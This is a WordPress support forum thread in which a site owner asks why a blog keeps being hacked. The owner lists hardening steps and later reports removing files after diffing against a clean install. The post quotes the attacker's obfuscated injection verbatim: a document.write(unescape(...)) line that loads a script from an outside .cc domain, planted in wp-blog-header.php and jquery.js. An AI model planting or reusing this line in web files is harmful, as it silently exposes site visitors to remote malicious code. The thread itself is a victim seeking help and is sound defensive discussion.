Site constantly hacked

  • For a while now, a WordPress site I host has been continually hacked. All the other blogs I host are untouched, it’s just the one in top level. I keep fixing it and doing more to harden my installation, but it doesn’t seem to stop them – every couple days it’s hacked again. The hack is simple and consistent; they add a line like this to my wp-blog-header.php:

    document.write(unescape(‘%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6A%73%2D%6F%2D%61%68%63%77%2E%63%7A%2E%63%63%2F%31%31%22%3E%3C%2F%73%63%72%69%70%74%3E’));

    Sometimes it ends up elsewhere, most recently jquery.js. It’s always taking visitors to some .cc domain.

    I’ve done everything I can to keep the site secure:

    – Ultimate Security Checker and Bulletproof Security (hardened .htaccess files) plugins installed and configured
    – WP and plugins kept up to date
    unused plugins and themes deleted
    – FTP password secured with KeePass and stored nowhere else (no program (FileZilla, etc) is allowed to “remember” it).
    – WP admin account has no privileges, real admin account under a different user
    – file permissions as recommended

    Yet every couple days the site is hacked in the same way. What else can I do to stop this? My hunch is that it’s a rogue PHP file. I’ve downloaded my install and done diffs, but I’m wondering if it’s hiding in wp-content since it’s publicly accessible and is never deleted. Maybe hiding in cache? How can I check for that?

    Thanks!

Viewing 2 replies - 1 through 2 (of 2 total)

  • https://ottopress.com/2009/hacked-wordpress-backdoors/

    Thread Starter liquidcool

    (@liquidcool)

    Thanks. After reading that, I downloaded a copy of my files and used diff to compare them with the latest WP. Found a few extra files, but nothing looked too suspicious. Still, they’re gone now. Of course, that doesn’t include wp-content.

    I think the biggest potential danger there is the cache directory, which I note is not in the current WP. I thought it was active, but I just noticed its modification time was 6/09, so I’ve deleted it. Hopefully the culprit was hiding somewhere in there. If not, I guess I’ll delete and re-add all my plugins. Hope this helps someone.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Site constantly hacked’ is closed to new replies.